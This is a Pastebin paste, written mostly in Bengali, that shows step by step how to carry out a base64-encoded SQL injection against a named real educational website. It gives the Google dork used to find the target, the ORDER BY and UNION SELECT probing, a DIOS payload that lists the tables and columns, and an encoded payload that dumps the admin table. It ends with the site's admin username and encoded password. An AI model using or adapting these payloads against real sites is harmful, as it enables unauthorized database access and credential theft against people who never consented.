Advertisement
3NCRYP73D_GH057

Base-64 Sql Injection

May 16th, 2019
227
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.86 KB | None | 0 0
  1. আজকে আমি দেখাবো base-64 Sql Injection!
  2. Target site:https://orionedutech.com/
  3.  
  4. এখন dork দিয়ে ইঞ্জেকসন পয়েন্ট খুজবো....
  5. site:orionedutech.com .php?id=
  6.  
  7. https://www.orionedutech.com/student_single.php?id=MjU=
  8.  
  9. ইঞ্জেকশন পয়েন্ট!
  10. এখন MjU= কে base-64 ডিকোড করি
  11.  
  12. https://www.orionedutech.com/student_single.php?id=25 <---এটি আসে
  13.  
  14. https://www.orionedutech.com/student_single.php?id=25'<--এনকোড করে দেখলাম error আসে
  15.  
  16. https://www.orionedutech.com/student_single.php?id=25'--+ <--এনকোড করে দেখলাম error fixed!
  17.  
  18. বার বার এনকোড ডিকোড করা সমস্যা তাই আমরা একটি টেকনিক প্রয়োগ করবো!
  19.  
  20. https://www.orionedutech.com/student_single.php?id=[BASE64]=25' order by 1-- -]
  21.  
  22. [BASE64]=25' order by 1-- -] <--এটি দেওয়ায় আমরা এনকোড ডিকোডের ঝামেলা থেকে মুক্তি পেলাম!
  23.  
  24. দেখবো কলাম সংখ্যা!
  25.  
  26. https://www.orionedutech.com/student_single.php?id=[BASE64]=25' order by 6-- -]
  27.  
  28. -->কলাম ৬ টি
  29.  
  30. এখন vulnerable কলাম বের করবো!
  31.  
  32. https://www.orionedutech.com/student_single.php?id=[BASE64]=-25' Union Select 1,2,3,4,5,6-- -] -->৩,৪,৫ নাম্বার কলাম vulnerable!
  33.  
  34. এখন ৫ নম্বর কলামে DIOS করবো এবং [BASE64]= , ] এই ২টি remove করে দিবো এবং তা base-64 এনকোড করবো!
  35.  
  36. https://www.orionedutech.com/student_single.php?id=25' Union Select 1,2,3,4,make_set(6,@:=0x0a,(select(1)from(information_schema.columns)where@:=make_set(511,@,0x3c6c693e,table_name,column_name)),@),6-- - -->Encode
  37.  
  38. https://www.orionedutech.com/student_single.php?id=MjUnIFVuaW9uIFNlbGVjdCAxLDIsMyw0LG1ha2Vfc2V0KDYsQDo9MHgwYSwoc2VsZWN0KDEpZnJvbShpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyl3aGVyZUA6PW1ha2Vfc2V0KDUxMSxALDB4M2M2YzY5M2UsdGFibGVfbmFtZSxjb2x1bW5fbmFtZSkpLEApLDYtLSAt
  39.  
  40. ,admin,admin_name,
  41. ,admin,password,
  42.  
  43. এখন admin টেবিল থেকে username এবং password ডাম্প করবো!
  44.  
  45. https://www.orionedutech.com/student_single.php?id=-25' Union Select 1,2,3,4,(SELECT(@x)FROM(SELECT(@x:=0x00) ,(SELECT(@x)FROM(admin)WHERE(@x)IN(@x:=CONCAT(0x20,@x,admin_name,0x3a3a,password,0x3c62723e))))x),6-- - -->Encode and Execute!
  46.  
  47. https://www.orionedutech.com/student_single.php?id=LTI1JyBVbmlvbiBTZWxlY3QgMSwyLDMsNCwoU0VMRUNUKEB4KUZST00oU0VMRUNUKEB4Oj0weDAwKSAsKFNFTEVDVChAeClGUk9NKGFkbWluKVdIRVJFKEB4KUlOKEB4Oj1DT05DQVQoMHgyMCxAeCxhZG1pbl9uYW1lLDB4M2EzYSxwYXNzd29yZCwweDNjNjI3MjNlKSkpKXgpLDYtLSAt
  48.  
  49. Username:admin
  50. Password:YWRtaW4xOTg0
  51.  
  52. Done!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement